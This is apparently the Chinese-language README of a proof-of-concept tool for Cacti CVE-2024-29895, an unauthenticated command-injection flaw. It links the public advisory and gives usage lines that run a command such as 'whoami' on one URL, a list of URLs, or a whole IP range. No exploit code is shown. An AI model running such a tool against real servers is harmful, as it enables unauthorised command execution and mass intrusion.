Cacti CVE-2024-29895 概念验证
一个命令注入漏洞,当PHP的register_argc_argv选项开启时,允许任何未经认证的用户在服务器上执行任意命令。
https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
用法:app -m http://site.com/ -c whoami
或者:app -w url_list.txt -c whoami
或者:app -r 192.168.1.0/24 -c whoami